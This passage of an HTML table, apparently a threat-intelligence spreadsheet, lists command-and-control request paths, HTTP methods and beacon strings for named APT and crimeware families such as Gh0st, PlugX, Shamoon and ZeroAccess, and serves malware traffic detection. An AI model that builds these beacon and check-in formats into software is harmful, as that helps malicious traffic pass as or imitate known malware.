<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gypthoy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gypthoy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/opt/mainpage.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/opt/mainpage.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Hupigon / Graybird"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hupigon / Graybird</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK..</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Variant Letsgo / TabMsgSQL downloader (comment crew)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Variant Letsgo / TabMsgSQL downloader (comment crew)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tapaoux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tapaoux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ol/yahoo/banner4.php?jpg=../yahoo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ol/yahoo/banner4.php?jpg=../yahoo</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Horst Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Horst Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PassAlert"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PassAlert</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/loader/bin/file1.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/loader/bin/file1.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Bitcoinminer"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Bitcoinminer</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Karagany Loader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Karagany Loader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/user/go.php?html=do"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/user/go.php?html=do</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"Gh0st....d...x.Kc``....@....\\..L@:8..,39U! 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">IXESHE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA\nx_bigfix_client_string: baQMyZrdqDAA"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA<br />x_bigfix_client_string: baQMyZrdqDAA</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT2</span></td><td data-sheets-value="[null,2,"KoreanBanker DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">KoreanBanker DL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/web/down/kbs.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/web/down/kbs.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Plugx"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Plugx</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PowerLoader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PowerLoader</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/postnuke/blog.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/postnuke/blog.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RssFeeder (moved from TBD tab, common name still unknown) 2nd stage"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">RssFeeder (moved from TBD tab, common name still unknown) 2nd stage</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/orange/news.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/orange/news.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RssFeeder (moved from TBD tab, common name still unknown) initialGET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">RssFeeder (moved from TBD tab, common name still unknown) initialGET</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/data/rss"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/data/rss</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Swami"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Swami</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/im/linux.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/im/linux.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Beebone downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Beebone downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/0/?f|-1813912965Admin\n/a/76876332/1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/0/?f|-1813912965Admin<br />/a/76876332/1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Neutrino EK var"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Neutrino EK var</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cxiqocvbqd"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cxiqocvbqd</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Comfoo / Vinself / Mspub"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Comfoo / Vinself / Mspub</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=000f72b8"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=000f72b8</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT2</span></td><td data-sheets-value="[null,2,"Disttrack / Shamoon"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Disttrack / Shamoon</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Avatar Rootkit"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Avatar Rootkit</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,3,null,9002]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">9002</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"9002..................wx....9002..................wx....9002......................."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">9002..................wx....9002..................wx....9002.......................</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MSWab /Yayih"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MSWab /Yayih</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/bbs/info.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bbs/info.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ZeroAccess / Sirefef"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ZeroAccess / Sirefef</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25\n/count.php?page=952000&style=LED_g&nbdigits=9"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25<br />/count.php?page=952000&style=LED_g&nbdigits=9</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ZeroAccess / Sirefef ppc fraud - redirect"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ZeroAccess / Sirefef ppc fraud - redirect</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"HTTP/1.1 302 Moved Temporarily"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">HTTP/1.1 302 Moved Temporarily</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,3,null,9002]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">9002</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/2d"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2d</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz gets list of C2s"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz gets list of C2s</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz Checkin"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz Checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz GETs spam template"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz GETs spam template</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Carberb"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Carberb</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV var (via Kuluoz - Asprox botnet)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">FakeAV var (via Kuluoz - Asprox botnet)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?qu="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?qu=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st var</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/h.gif?pid =113&v=130586214568 HTTP/ 1. 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/h.gif?pid =113&v=130586214568 HTTP/ 1. 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Guntior - CN bootkit"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Guntior - CN bootkit</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/yx/tongji.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/yx/tongji.html</span></td></tr>
